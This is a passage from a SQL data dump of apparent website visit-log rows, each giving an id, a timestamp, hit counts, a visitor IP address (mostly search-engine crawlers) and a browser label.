,'54.36.149.41','other'),(251232,1527510881,1,1,0,0,'54.36.149.49','other'),(251233,1527510959,2,2,0,0,'178.154.171.88','other'),(251234,1527510990,1,1,0,0,'54.36.149.93','other'),(251235,1527511016,1,1,0,0,'8.29.198.27','other'),(251236,1527511103,1,1,0,0,'54.36.148.46','other'),(251237,1527511117,1,1,0,0,'54.36.149.82','other'),(251238,1527511240,1,1,0,0,'54.36.149.62','other'),(251239,1527511424,1,1,0,0,'87.250.224.46','other'),(251240,1527511526,1,1,0,0,'66.249.70.25','chrome'),(251241,1527511640,2,2,0,0,'162.210.196.130','other'),(251242,1527511706,1,1,0,0,'91.196.178.130','firefox'),(251243,1527511777,3,3,0,0,'216.244.66.241','other'),(251244,1527512001,1,1,0,0,'54.36.148.219','other'),(251245,1527512119,1,1,0,0,'54.36.148.146','other'),(251246,1527512275,1,1,0,0,'157.55.39.69','other'),(251247,1527512388,1,1,0,0,'54.36.149.81','other'),(251248,1527512401,2,0,2,0,'66.249.64.29',''),(251249,1527512402,1,1,0,0,'54.36.148.165','other'),(251250,1527512620,1,0,1,0,'66.249.64.30',''),(251251,1527512743,1,1,0,0,'178.154.171.88','other'),(251252,1527512802,1,1,0,0,'54.36.148.251','other'),(251253,1527512824,1,1,0,0,'216.244.66.241','other'),(251254,1527513004,1,1,0,0,'54.36.149.60','other'),(251255,1527513155,1,1,0,0,'54.36.149.47','other'),(251256,1527513325,1,1,0,0,'157.55.39.114','other'),(251257,1527513355,1,1,0,0,'54.36.149.58','other'),(251258,1527513378,2,1,1,0,'66.249.64.28',''),(251259,1527513527,1,1,0,0,'54.36.148.149','other'),(251260,1527513592,1,1,0,0,'54.36.148.167','other'),(251261,1527513637,1,1,0,0,'54.36.149.37','other'),(251262,1527514396,1,1,0,0,'54.36.148.218','other'),(251263,1527514509,1,1,0,0,'54.36.148.25','other'),(251264,1527514813,1,1,0,0,'54.36.149.25','other'),(251265,1527514889,1,1,0,0,'54.36.148.182','other'),(251266,1527515124,1,0,1,0,'66.249.70.25',''),(251267,1527515678,1,1,0,0,'54.36.149.107','other'),(251268,1527515847,1,1,0,0,'54.36.148.204','other'),(251269,1527516119,1,1,0,0,'54.36.148.180','other'),(251270,1527516175,1,1,0,0,'54.36.148.84','other'),(251271,1527516381,1,1,0,0,'54.36.148.63','other'),(251272,1527516397,1,1,0,0,'8.29.198.26','other'),(251273,1527516468,1,1,0,0,'54.36.148.148','other'),(251274,1527516520,1,1,0,0,'54.36.149.66','other'),(251275,1527516881,1,1,0,0,'54.36.148.222','other'),(251276,1527516886,1,1,0,0,'216.244.66.241','other'),(251277,1527517053,1,1,0,0,'157.55.39.69','other'),(251278,1527517328,1,1,0,0,'54.36.149.1','other'),(251279,1527517385,1,1,0,0,'54.36.149.96','other'),(251280,1527518079,1,1,0,0,'95.163.255.98','other'),(251281,1527518155,2,2,0,0,'216.244.66.241','other'),(251282,1527518327,1,1,0,0,'95.163.255.97','other'),(251283,1527518428,1,1,0,0,'54.36.149.79','other'),(251284,1527518497,1,1,0,0,'54.36.149.18','other'),(251285,1527518909,1,1,0,0,'54.36.148.25','other'),(251286,1527519081,1,0,1,0,'66.249.64.29',''),(251287,1527519186,1,1,0,0,'54.36.148.67','other'),(251288,1527519314,1,1,0,0,'54.36.148.155','other'),(251289,1527519411,1,1,0,0,'54.36.149.92','other'),(251290,1527519542,1,1,0,0,'141.8.142.74','other'),(251291,1527519978,1,1,0,0,'54.36.148.197','other'),(251292,1527519984,1,1,0,0,'216.244.66.241','other'),(251293,1527520016,1,1,0,0,'54.36.149.43','other'),(251294,1527520084,1,1,0,0,'54.36.149.54','other'),(251295,1527520654,1,1,0,0,'66.249.70.27','chrome'),(251296,1527520735,1,1,0,0,'54.36.148.50','other'),(251297,1527520770,1,1,0,0,'141.8.142.74','other'),(251298,1527520883,1,1,0,0,'54.36.149.35','other'),(251299,1527520924,1,1,0,0,'54.36.148.84','other'),(251300,1527521458,2,2,0,0,'178.92.74.8','chrome'),(251301,1527521554,1,1,0,0,'54.36.148.116','other'),(251302,1527521646,1,1,0,0,'54.36.148.38','other'),(251303,1527521679,1,1,0,0,'54.36.148.168','other'),(251304,1527521857,1,1,0,0,'8.29.198.26','other'),(251305,1527521922,1,0,1,0,'66.249.64.29',''),(251306,1527521933,1,1,0,0,'54.36.149.79','other'),(251307,1527521937,1,1,0,0,'54.36.148.98','other'),(251308,1527522207,1,1,0,0,'87.250.224.46','other'),(251309,1527522212,1,1,0,0,'54.36.148.96','other'),(251310,1527522384,1,1,0,0,'54.36.148.100','other'),(251311,1527522393,1,1,0,0,'66.249.64.30','chrome'),(251312,1527522398,1,0,1,0,'66.249.70.27',''),(251313,1527522488,1,0,1,0,'66.249.70.25',''),(251314,1527522595,1,1,0,0,'54.36.148.72','other'),(251315,1527522638,2,2,0,0,'141.8.142.74','other'),(251316,1527522745,1,1,0,0,'178.154.171.88','other'),(251317,1527522823,1,1,0,0,'216.244.66.241','other'),(251318,1527522915,1,1,0,0,'54.36.149.69','other'),(251319,1527523408,1,1,0,0,'54.36.149.93','other'),(251320,1527523457,1,1,0,0,'54.36.148.55','other'),(251321,1527523632,1,1,0,0,'37.9.113.182','other'),(251322,1527523636,1,1,0,0,'141.8.142.74','other'),(251323,1527524094,1,1,0,0,'87.250.224.46','other'),(251324,1527524266,1,1,0,0,'54.36.148.179','other'),(251325,1527524444,1,1,0,0,'54.36.148.32','other'),(251326,1527524474,1,1,0,0,'54.36.148.176','other'),(251327,1527524479,1,1,0,0,'54.36.148.188','other'),(251328,1527524681,1,1,0,0,'54.36.148.17','other'),(251329,1527524711,1,1,0,0,'54.36.148.161','other'),(251330,1527525056,1,1,0,0,'95.163.255.3','other'),(251331,1527525415,1,1,0,0,'54.36.148.124','other'),(251332,1527525482,1,1,0,0,'54.36.148.71','other'),(251333,1527525693,1,1,0,0,'54.36.149.68','other'),(251334,1527525945,1,1,0,0,'66.249.70.25','chrome'),(251335,1527526401,1,1,0,0,'54.36.148.88','other'),(251336,1527526518,1,1,0,0,'178.154.171.88','other'),(251337,1527526697,1,1,0,0,'54.36.149.91','other'),(251338,1527526742,1,1,0,0,'54.36.148.142','other'),(251339,1527527236,1,1,0,0,'8.29.198.26','other'),(251340,1527527414,2,0,2,0,'66.249.64.28',''),(251341,1527527533,1,1,0,0,'54.36.148.10','other'),(251342,1527527755,1,1,0,0,'141.8.142.74','other'),(251343,1527527940,1,0,1,0,'66.249.70.27',''),(251344,1527528488,1,1,0,0,'54.36.148.251','other'),(251345,1527528698,1,1,0,0,'178.154.171.88','other'),(251346,1527528923,1,1,0,0,'54.36.148.222','other'),(251347,1527529019,1,1,0,0,'54.36.149.43','other'),(251348,1527529345,1,0,1,0,'66.249.64.29',''),(251349,1527529820,1,1,0,0,'54.36.148.197','other'),(251350,1527529841,1,1,0,0,'66.249.64.30','chrome'),(251351,1527529894,1,1,0,0,'54.36.149.70','other'),(251352,1527529915,1,1,0,0,'54.36.149.85','other'),(251353,1527530906,1,1,0,0,'54.36.148.186','other'),(251354,1527531372,1,1,0,0,'54.36.148.171','other'),(251355,1527531583,1,1,0,0,'66.249.70.25','chrome'),(251356,1527531650,1,0,1,0,'66.249.70.29',''),(251357,1527531730,2,2,0,0,'141.8.142.74','other'),(251358,1527531769,1,1,0,0,'54.36.149.23','other'),(251359,1527531997,1,1,0,0,'54.36.148.163','other'),(251360,1527532518,1,1,0,0,'54.36.148.41','other'),(251361,1527532687,1,1,0,0,'216.244.66.241','other'),(251362,1527532693,1,1,0,0,'8.29.198.26','other'),(251363,1527532938,1,1,0,0,'54.36.148.189','other'),(251364,1527533218,1,0,1,0,'66.249.64.28',''),(251365,1527533274,1,1,0,0,'87.250.224.46','other'),(251366,1527533435,1,1,0,0,'54.36.148.84','other'),(251367,1527533567,1,1,0,0,'54.36.148.60','other'),(251368,1527533610,1,1,0,0,'54.36.148.114','other'),(251369,1527534329,1,1,0,0,'141.8.142.74','other'),(251370,1527534456,1,1,0,0,'54.36.148.136','other'),(251371,1527534537,1,1,0,0,'54.36.148.47','other'),(251372,1527534585,1,1,0,0,'180.76.15.154','other'),(251373,1527534593,1,1,0,0,'54.36.148.171','other'),(251374,1527535330,1,1,0,0,'95.163.255.95','other'),(251375,1527535347,1,1,0,0,'54.36.148.123','other'),(251376,1527535364,1,1,0,0,'54.36.148.46','other'),(251377,1527535384,1,0,1,0,'66.249.64.30',''),(251378,1527535567,1,1,0,0,'54.36.148.83','other'),(251379,1527535657,1,1,0,0,'141.8.142.74','other'),(251380,1527535660,1,1,0,0,'178.154.171.88','other'),(251381,1527536018,1,1,0,0,'54.36.149.72','other'),(251382,1527536100,1,1,0,0,'54.36.148.193','other'),(251383,1527536362,1,0,1,0,'66.249.64.28',''),(251384,1527536600,1,1,0,0,'54.36.148.20','other'),(251385,1527537190,1,1,0,0,'66.249.70.27','chrome'),(251386,1527537700,1,1,0,0,'54.36.148.161','other'),(251387,1527537771,1,1,0,0,'54.36.148.90','other'),(251388,1527537775,1,1,0,0,'37.9.113.110','other'),(251389,1527537829,1,1,0,0,'54.36.148.46','other'),(251390,1527537901,1,1,0,0,'54.36.148.230','other'),(251391,1527538072,1,1,0,0,'8.29.198.25','other'),(251392,1527538197,1,1,0,0,'54.36.148.33','other'),(251393,1527538374,1,1,0,0,'54.36.148.68','other'),(251394,1527538482,2,0,2,0,'66.249.70.27',''),(251395,1527538506,1,1,0,0,'66.249.64.30','chrome'),(251396,1527538510,1,1,0,0,'54.36.149.6','other'),(251397,1527538678,1,1,0,0,'54.36.149.23','other'),(251398,1527538776,1,1,0,0,'54.36.149.66','other'),(251399,1527538855,2,2,0,0,'178.154.171.88','other'),(251400,1527539021,1,1,0,0,'54.36.149.18','other'),(251401,1527539151,1,1,0,0,'54.36.149.106','other'),(251402,1527540034,1,1,0,0,'54.36.148.253','other'),(251403,1527540082,1,1,0,0,'54.36.148.34','other'),(251404,1527540512,1,1,0,0,'54.36.148.60','other'),(251405,1527540913,1,1,0,0,'54.36.149.17','other'),(251406,1527540942,1,1,0,0,'54.36.148.108','other'),(251407,1527541235,1,1,0,0,'178.154.171.88','other'),(251408,1527541529,1,1,0,0,'54.36.148.89','other'),(251409,1527541566,1,1,0,0,'54.36.148.226','other'),(251410,1527541604,1,1,0,0,'54.36.148.27','other'),(251411,1527541695,2,2,0,0,'141.8.142.74','other'),(251412,1527541713,1,1,0,0,'54.36.149.48','other'),(251413,1527542278,1,1,0,0,'54.36.149.76','other'),(251414,1527542792,1,1,0,0,'54.36.148.54','other'),(251415,1527542989,1,1,0,0,'54.36.148.202','other'),(251416,1527543137,1,1,0,0,'178.154.171.88','other'),(251417,1527543279,1,1,0,0,'54.36.148.173','other'),(251418,1527543419,1,1,0,0,'54.36.148.95','other'),(251419,1527543463,1,1,0,0,'54.36.148.247','other'),(251420,1527543528,1,1,0,0,'8.29.198.27','other'),(251421,1527543533,1,0,1,0,'66.249.64.29',''),(251422,1527543624,1,1,0,0,'54.36.148.239','other'),(251423,1527543935,1,1,0,0,'66.249.70.25','chrome'),(251424,1527544013,1,1,0,0,'66.249.64.29','chrome'),(251425,1527544060,1,1,0,0,'54.36.148.22','other'),(251426,1527544558,1,1,0,0,'37.48.105.203','firefox'),(251427,1527544616,1,1,0,0,'141.8.142.74','other'),(251428,1527544929,1,1,0,0,'54.36.148.230','other'),(251429,1527545401,1,1,0,0,'54.36.149.47','other'),(251430,1527545452,1,1,0,0,'54.36.148.71','other'),(251431,1527545958,1,1,0,0,'54.36.148.174','other'),(251432,1527545967,1,1,0,0,'46.42.143.152','msie'),(251433,1527546128,1,1,0,0,'54.36.149.61','other'),(251434,1527546312,1,1,0,0,'54.36.148.26','other'),(251435,1527546368,1,1,0,0,'54.36.149.37','other'),(251436,1527546375,1,1,0,0,'54.36.148.193','other'),(251437,1527546483,1,1,0,0,'54.36.148.33','other'),(251438,1527546741,1,1,0,0,'54.36.148.102','other'),(251439,1527546808,1,1,0,0,'54.36.149.40','other'),(251440,1527546990,1,1,0,0,'178.154.171.88','other'),(251441,1527547232,1,1,0,0,'54.36.148.64','other'),(251442,1527547247,1,1,0,0,'54.36.148.145','other'),(251443,1527547329,1,1,0,0,'54.36.148.13','other'),(251444,1527547435,1,1,0,0,'157.55.39.190','other'),(251445,1527547465,1,1,0,0,'54.36.148.100','other'),(251446,1527547728,1,1,0,0,'54.36.148.170','other'),(251447,1527547767,1,0,1,0,'66.249.64.28',''),(251448,1527547904,1,1,0,0,'141.8.142.74','other'),(251449,1527547908,1,1,0,0,'178.154.171.88','other'),(251450,1527548574,1,1,0,0,'54.36.148.25','other'),(251451,1527548762,1,1,0,0,'157.55.39.69','other'),(251452,1527548773,1,1,0,0,'54.36.148.79','other'),(251453,1527548903,1,1,0,0,'8.29.198.27','other'),(251454,1527548992,1,1,0,0,'141.8.142.74','other'),(251455,1527549203,1,0,1,0,'66.249.70.25',''),(251456,1527549343,1,1,0,0,'66.249.70.29','chrome'),(251457,1527550617,1,1,0,0,'54.36.149.18','other'),(251458,1527550783,1,1,0,0,'54.36.148.246','other'),(251459,1527551067,1,1,0,0,'54.36.148.207','other'),(251460,1527551125,2,2,0,0,'141.8.142.74','other'),(251461,1527551905,1,1,0,0,'95.163.255.12','other'),(251462,1527552009,1,1,0,0,'54.36.149.10','other'),(251463,1527552165,1,1,0,0,'54.36.149.6','other'),(251464,1527552354,1,1,0,0,'54.36.148.134','other'),(251465,1527552667,1,1,0,0,'54.36.148.247','other'),(251466,1527552822,1,0,1,0,'66.249.64.29',''),(251467,1527552986,1,1,0,0,'66.249.64.30','chrome'),(251468,1527553415,1,1,0,0,'54.36.148.202','other'),(251469,1527553525,1,1,0,0,'54.36.148.68','other'),(251470,1527553772,1,1,0,0,'54.36.148.200','other'),(251471,1527554016,1,1,0,0,'54.36.149.30','other'),(251472,1527554029,1,1,0,0,'54.36.148.133','other'),(251473,1527554199,1,1,0,0,'54.36.148.194','other'),(251474,1527554360,1,1,0,0,'8.29.198.26','other'),(251475,1527554655,1,1,0,0,'141.8.142.74','other'),(251476,1527554729,1,1,0,0,'54.36.148.142','other'),(251477,1527554821,1,1,0,0,'54.36.148.176','other'),(251478,1527554914,1,1,0,0,'66.249.70.25','chrome'),(251479,1527555043,1,1,0,0,'157.55.39.69','other'),(251480,1527555070,1,1,0,0,'54.36.148.250','other'),(251481,1527555436,1,1,0,0,'54.36.148.16','other'),(251482,1527555678,1,1,0,0,'54.36.149.58','other'),(251483,1527555742,1,1,0,0,'54.36.148.131','other'),(251484,1527555893,1,1,0,0,'54.36.148.109','other'),(251485,1527556395,1,1,0,0,'54.36.148.114','other'),(251486,1527556431,1,0,1,0,'66.249.70.25',''),(251487,1527556929,1,1,0,0,'54.36.148.132','other'),(251488,1527556941,1,1,0,0,'95.163.255.97','other'),(251489,1527557354,1,1,0,0,'54.36.148.134','other'),(251490,1527557373,1,1,0,0,'54.36.148.249','other'),(251491,1527557577,1,1,0,0,'54.36.148.186','other'),(251492,1527557610,1,1,0,0,'54.36.148.110','other'),(251493,1527557919,1,1,0,0,'54.36.149.10','other'),(251494,1527558323,2,0,2,0,'66.249.64.29',''),(251495,1527558490,1,1,0,0,'141.8.142.74','other'),(251496,1527558650,1,1,0,0,'80.93.187.57','chrome'),(251497,1527558672,1,1,0,0,'54.36.149.46','other'),(251498,1527558978,1,1,0,0,'66.249.64.29','chrome'),(251499,1527558983,1,1,0,0,'95.163.255.9','other'),(251500,1527558986,1,1,0,0,'54.36.149.88','other'),(251501,1527558990,1,1,0,0,'54.36.148.44','other'),(251502,1527559593,1,1,0,0,'54.36.148.81','other'),(251503,1527559738,1,1,0,0,'8.29.198.27','other'),(251504,1527560093,1,1,0,0,'178.154.171.88','other'),(251505,1527560339,1,1,0,0,'95.163.255.99','other'),(251506,1527560346,1,1,0,0,'95.163.255.2','other'),(251507,1527560788,1,1,0,0,'54.36.148.225','other'),(251508,1527560799,1,1,0,0,'54.36.149.105','other'),(251509,1527561226,1,1,0,0,'54.36.148.186','other'),(251510,1527561299,1,0,1,0,'66.249.70.29',''),(251511,1527561475,1,1,0,0,'66.249.70.29','chrome'),(251512,1527561491,15,15,0,0,'178.151.245.174','other'),(251513,1527561519,1,1,0,0,'54.36.148.47','other'),(251514,1527562038,2,2,0,0,'95.213.141.126','opera'),(251515,1527562078,1,1,0,0,'54.36.149.70','other'),(251516,1527562147,1,1,0,0,'54.36.148.149','other'),(251517,1527562167,1,1,0,0,'54.36.148.140','other'),(251518,1527562545,1,1,0,0,'54.36.149.21','other'),(251519,1527563012,1,1,0,0,'141.8.142.74','other'),(251520,1527563539,1,1,0,0,'5.167.181.75','chrome'),(251521,1527563618,1,1,0,0,'54.36.148.211','other'),(251522,1527563774,1,1,0,0,'54.36.149.25','other'),(251523,1527563805,2,0,2,0,'66.249.64.30',''),(251524,1527564471,1,1,0,0,'54.36.148.25','other'),(251525,1527564535,1,1,0,0,'157.55.39.248','other'),(251526,1527564829,1,1,0,0,'54.36.149.63','other'),(251527,1527565002,1,1,0,0,'54.36.148.115','other'),(251528,1527565201,1,1,0,0,'8.29.198.25','other'),(251529,1527565332,1,0,1,0,'66.249.64.30',''),(251530,1527565715,1,1,0,0,'54.36.148.106','other'),(251531,1527566889,1,1,0,0,'54.36.149.35','other'),(251532,1527566993,1,1,0,0,'54.36.148.36','other'),(251533,1527567223,1,1,0,0,'66.249.64.28','chrome'),(251534,1527567314,1,0,1,0,'66.249.70.29',''),(251535,1527567365,1,1,0,0,'66.249.70.25','chrome'),(251536,1527567707,2,2,0,0,'141.8.142.74','other'),(251537,1527568243,1,1,0,0,'54.36.149.87','other'),(251538,1527568433,1,1,0,0,'54.36.149.37','other'),(251539,1527568572,1,1,0,0,'54.36.149.26','other'),(251540,1527568606,1,1,0,0,'54.36.148.164','other'),(251541,1527568819,1,1,0,0,'54.36.149.19','other'),(251542,1527568820,1,1,0,0,'54.36.148.107','other'),(251543,1527569207,1,1,0,0,'54.36.149.96','other'),(251544,1527569585,1,1,0,0,'54.36.148.133','other'),(251545,1527569952,1,0,1,0,'66.249.64.30',''),(251546,1527569970,1,1,0,0,'54.36.148.233','other'),(251547,1527570179,1,1,0,0,'54.36.149.8','other'),(251548,1527570559,1,1,0,0,'54.36.149.2','other'),(251549,1527570566,1,1,0,0,'8.29.198.25','other'),(251550,1527570883,1,1,0,0,'54.36.148.242','other'),(251551,1527570931,1,1,0,0,'54.36.149.45','other'),(251552,1527571191,1,1,0,0,'46.133.15.76','chrome'),(251553,1527571635,2,2,0,0,'91.196.178.169','chrome'),(251554,1527571754,1,1,0,0,'130.180.220.226','chrome'),(251555,1527571869,1,1,0,0,'37.55.77.44','chrome'),(251556,1527571912,1,0,1,0,'66.249.64.28',''),(251557,1527571956,1,0,1,0,'66.249.64.30',''),(251558,1527572175,1,1,0,0,'54.36.148.137','other'),(251559,1527572429,1,1,0,0,'54.36.148.203','other'),(251560,1527572508,1,1,0,0,'54.36.149.33','other'),(251561,1527572565,1,1,0,0,'91.196.178.69','firefox'),(251562,1527572622,1,1,0,0,'54.36.148.183','other'),(251563,1527572756,2,2,0,0,'66.249.64.29','chrome'),(251564,1527572760,1,1,0,0,'66.249.70.27','chrome'),(251565,1527573061,6,6,0,0,'95.216.5.160','other'),(251566,1527573314,2,2,0,0,'91.196.178.89','chrome'),(251567,1527573422,1,1,0,0,'54.36.148.154','other'),(251568,1527573652,1,1,0,0,'54.36.148.172','other'),(251569,1527574002,1,1,0,0,'176.113.209.232','chrome'),(251570,1527574256,1,1,0,0,'95.163.255.4','other'),(251571,1527574421,1,1,0,0,'54.36.149.46','other'),(251572,1527574537,1,1,0,0,'54.36.149.23','other'),(251573,1527574602,1,1,0,0,'54.36.148.181','other'),(251574,1527574699,1,1,0,0,'95.163.255.8','other'),(251575,1527574701,2,2,0,0,'195.201.140.232','other'),(251576,1527574707,1,1,0,0,'141.8.142.74','other'),(251577,1527574841,1,1,0,0,'54.36.149.9','other'),(251578,1527574997,1,1,0,0,'54.36.148.23','other'),(251579,1527575186,1,1,0,0,'54.36.148.104','other'),(251580,1527575337,1,1,0,0,'54.36.148.239','other'),(251581,1527575387,1,0,1,0,'66.249.64.29',''),(251582,1527575399,1,1,0,0,'91.196.178.69','firefox'),(251583,1527575981,1,0,1,0,'66.249.70.27',''),(251584,1527576038,1,1,0,0,'8.29.198.26','other'),(251585,1527576118,1,1,0,0,'54.36.148.67','other'),(251586,1527576219,1,1,0,0,'91.239.81.170','chrome'),(251587,1527576838,1,1,0,0,'54.36.148.121','other'),(251588,1527577186,1,1,0,0,'178.154.171.88','other'),(251589,1527578017,1,1,0,0,'54.36.149.75','other'),(251590,1527578038,1,1,0,0,'54.36.149.49','other'),(251591,1527578275,1,1,0,0,'46.161.9.39','chrome'),(251592,1527578373,1,0,1,0,'66.249.70.27',''),(251593,1527578684,1,1,0,0,'54.36.148.162','other'),(251594,1527578784,1,1,0,0,'54.36.148.119','other'),(251595,1527578980,2,2,0,0,'91.196.178.102','chrome'),(251596,1527579553,1,1,0,0,'54.36.148.253','other'),(251597,1527579666,1,1,0,0,'54.36.148.247','other'),(251598,1527580169,1,1,0,0,'141.8.142.74','other'),(251599,1527580292,1,1,0,0,'54.36.148.10','other'),(251600,1527580396,2,2,0,0,'195.230.119.59','chrome'),(251601,1527580398,1,1,0,0,'54.36.148.188','other'),(251602,1527580415,1,1,0,0,'212.124.114.242','firefox'),(251603,1527580891,1,1,0,0,'54.36.148.152','other'),(251604,1527581175,3,3,0,0,'91.196.178.89','chrome'),(251605,1527581324,1,1,0,0,'54.36.148.254','other'),(251606,1527581398,1,1,0,0,'8.29.198.26','other'),(251607,1527581542,1,1,0,0,'37.9.113.157','other'),(251608,1527581657,1,1,0,0,'54.36.148.130','other'),(251609,1527581902,1,0,1,0,'66.249.70.25',''),(251610,1527581923,1,1,0,0,'54.36.148.235','other'),(251611,1527581960,1,1,0,0,'54.36.148.50','other'),(251612,1527581987,1,1,0,0,'146.185.157.242','chrome'),(251613,1527582084,1,1,0,0,'13.56.232.243','chrome'),(251614,1527582168,1,1,0,0,'178.95.249.140','chrome'),(251615,1527582637,1,1,0,0,'178.154.171.88','other'),(251616,1527582766,1,1,0,0,'173.252.98.80','other'),(251617,1527582780,1,1,0,0,'54.36.149.40','other'),(251618,1527582948,1,1,0,0,'146.185.157.242','chrome'),(251619,1527582965,1,1,0,0,'95.163.255.5','other'),(251620,1527583139,1,1,0,0,'54.36.148.226','other'),(251621,1527583157,1,1,0,0,'95.133.183.213','chrome'),(251622,1527583249,1,1,0,0,'91.196.178.133','chrome'),(251623,1527583373,1,1,0,0,'54.36.148.251','other'),(251624,1527583637,2,2,0,0,'91.196.178.56','chrome'),(251625,1527583678,1,1,0,0,'54.36.149.43','other'),(251626,1527583806,1,1,0,0,'54.36.149.14','other'),(251627,1527583827,1,1,0,0,'91.196.178.129','firefox'),(251628,1527583935,1,1,0,0,'173.252.88.116','other'),(251629,1527583937,1,1,0,0,'54.36.149.6','other'),(251630,1527583940,1,1,0,0,'54.36.148.119','other'),(251631,1527584124,1,1,0,0,'165.227.209.146','other'),(251632,1527584226,3,3,0,0,'95.132.3.186','firefox'),(251633,1527584227,1,1,0,0,'199.58.86.206','other'),(251634,1527584232,1,1,0,0,'54.36.148.116','other'),(251635,1527584364,1,1,0,0,'87.250.224.125','other'),(251636,1527584375,1,1,0,0,'37.9.113.56','other'),(251637,1527584577,1,1,0,0,'54.36.149.42','other'),(251638,1527584587,1,1,0,0,'178.154.200.73','other'),(251639,1527584599,1,1,0,0,'54.36.149.1','other'),(251640,1527584763,1,1,0,0,'188.32.220.194','msie'),(251641,1527584900,2,2,0,0,'95.216.10.20','other'),(251642,1527584986,1,1,0,0,'176.113.209.232','chrome'),(251643,1527585034,1,1,0,0,'54.36.149.57','other'),(251644,1527585137,1,1,0,0,'54.36.148.128','other'),(251645,1527585220,1,1,0,0,'91.196.178.94','other'),(251646,1527585227,1,1,0,0,'95.67.58.182','other'),(251647,1527585379,1,1,0,0,'95.163.255.15','other'),(251648,1527585826,1,1,0,0,'54.36.148.178','other'),(251649,1527585986,1,1,0,0,'54.36.148.85','other'),(251650,1527586096,1,1,0,0,'77.111.244.34','chrome'),(251651,1527586409,1,1,0,0,'94.231.188.10','firefox'),(251652,1527586470,1,1,0,0,'54.36.148.173','other'),(251653,1527586555,1,1,0,0,'54.36.149.27','other'),(251654,1527586871,1,1,0,0,'8.29.198.25','other'),(251655,1527586877,1,1,0,0,'54.36.149.89','other'),(251656,1527587023,1,1,0,0,'193.41.129.90','other'),(251657,1527587157,1,1,0,0,'77.111.244.34','chrome'),(251658,1527587171,1,1,0,0,'141.8.142.74','other'),(251659,1527587464,1,1,0,0,'54.36.148.224','other'),(251660,1527587639,1,1,0,0,'54.36.148.31','other'),(251661,1527587850,1,1,0,0,'91.196.178.4','other'),(251662,1527588247,1,1,0,0,'91.196.178.161','other'),(251663,1527588273,1,1,0,0,'54.36.148.73','other'),(251664,1527588596,1,1,0,0,'46.211.27.75','chrome'),(251665,1527588608,1,1,0,0,'54.36.149.96','other'),(251666,1527588831,1,1,0,0,'54.36.148.229','other'),(251667,1527588917,1,1,0,0,'141.8.142.74','other'),(251668,1527589130,1,1,0,0,'54.36.149.43','other'),(251669,1527589722,1,0,1,0,'66.249.70.29',''),(251670,1527589777,1,1,0,0,'95.163.255.93','other'),(251671,1527589838,1,1,0,0,'54.36.148.129','other'),(251672,1527590065,1,1,0,0,'54.36.148.45','other'),(251673,1527590264,1,1,0,0,'95.163.255.13','other'),(251674,1527590390,1,1,0,0,'91.124.235.226','chrome'),(251675,1527590489,1,1,0,0,'69.171.251.9','other'),(251676,1527590670,2,2,0,0,'141.8.142.74','other'),(251677,1527590683,1,1,0,0,'54.36.149.18','other'),(251678,1527590881,1,1,0,0,'188.0.104.156','chrome'),(251679,1527590998,1,0,1,0,'66.249.70.25',''),(251680,1527591041,1,1,0,0,'54.36.148.131','other'),(251681,1527591117,2,2,0,0,'130.180.217.206','chrome'),(251682,1527591205,1,0,1,0,'66.249.64.28',''),(251683,1527591330,1,1,0,0,'54.36.149.22','other'),(251684,1527591366,1,1,0,0,'46.211.155.54','other'),(251685,1527591889,1,1,0,0,'180.76.15.142','other'),(251686,1527592014,1,1,0,0,'54.36.148.12','other'),(251687,1527592059,2,2,0,0,'91.196.178.27','chrome'),(251688,1527592158,1,1,0,0,'188.231.245.7','chrome'),(251689,1527592231,1,1,0,0,'213.180.203.8','other'),(251690,1527592234,1,1,0,0,'8.29.198.25','other'),(251691,1527592247,1,0,1,0,'66.249.64.29',''),(251692,1527592560,2,2,0,0,'91.196.177.46','chrome'),(251693,1527592879,1,1,0,0,'54.36.149.52','other'),(251694,1527592895,1,1,0,0,'91.196.178.129','chrome'),(251695,1527592912,1,1,0,0,'216.244.66.241','other'),(251696,1527593223,1,1,0,0,'95.133.199.144','opera'),(251697,1527593687,1,1,0,0,'54.36.149.33','other'),(251698,1527594374,2,2,0,0,'91.196.178.66','chrome'),(251699,1527594656,1,0,1,0,'66.249.64.30',''),(251700,1527594738,1,1,0,0,'91.196.178.79','chrome'),(251701,1527594801,1,1,0,0,'91.196.178.45','chrome'),(251702,1527595426,1,0,1,0,'66.249.70.25',''),(251703,1527595512,1,1,0,0,'54.36.148.16','other'),(251704,1527595575,1,1,0,0,'54.36.148.70','other'),(251705,1527595647,1,1,0,0,'95.134.108.209','chrome'),(251706,1527595875,1,1,0,0,'66.249.64.29','chrome'),(251707,1527595969,1,1,0,0,'80.93.116.226','chrome'),(251708,1527596135,1,1,0,0,'54.36.148.215','other'),(251709,1527596255,1,1,0,0,'178.154.171.88','other'),(251710,1527596336,2,2,0,0,'91.196.178.161','chrome'),(251711,1527596590,1,0,1,0,'66.249.64.30',''),(251712,1527596705,1,1,0,0,'31.43.31.137','chrome'),(251713,1527596710,1,1,0,0,'54.36.149.91','other'),(251714,1527596758,1,1,0,0,'54.36.149.72','other'),(251715,1527596963,1,1,0,0,'91.196.178.136','firefox'),(251716,1527596998,1,1,0,0,'54.36.149.31','other'),(251717,1527597112,1,1,0,0,'54.36.148.49','other'),(251718,1527597274,1,1,0,0,'194.88.153.38','chrome'),(251719,1527597307,1,1,0,0,'195.234.69.158','chrome'),(251720,1527597570,1,1,0,0,'106.120.160.109','chrome'),(251721,1527597717,1,1,0,0,'8.29.198.26','other'),(251722,1527597915,2,2,0,0,'91.196.178.69','chrome'),(251723,1527598056,1,1,0,0,'80.93.116.226','chrome'),(251724,1527598152,1,1,0,0,'54.36.148.29','other'),(251725,1527598224,1,1,0,0,'87.250.224.46','other'),(251726,1527598394,1,1,0,0,'54.36.148.219','other'),(251727,1527598633,1,1,0,0,'54.36.148.50','other'),(251728,1527598828,1,1,0,0,'54.36.149.86','other'),(251729,1527598898,1,1,0,0,'54.36.148.201','other'),(251730,1527599029,1,1,0,0,'157.55.39.190','other'),(251731,1527599157,1,1,0,0,'91.196.178.161','chrome'),(251732,1527599756,1,1,0,0,'62.205.134.182','msie'),(251733,1527600362,1,1,0,0,'178.154.171.88','other'),(251734,1527600638,1,1,0,0,'180.76.15.139','other'),(251735,1527600746,1,1,0,0,'66.249.70.25','chrome'),(251736,1527600763,3,3,0,0,'216.244.66.241','other'),(251737,1527600854,1,1,0,0,'54.36.148.117','other'),(251738,1527601255,1,1,0,0,'54.36.149.20','other'),(251739,1527601314,1,1,0,0,'141.8.142.74','other'),(251740,1527601333,1,1,0,0,'95.163.255.13','other'),(251741,1527601335,1,1,0,0,'54.36.148.51','other'),(251742,1527601479,1,1,0,0,'54.36.148.66','other'),(251743,1527601617,1,1,0,0,'54.36.149.87','other'),(251744,1527601623,1,1,0,0,'87.250.224.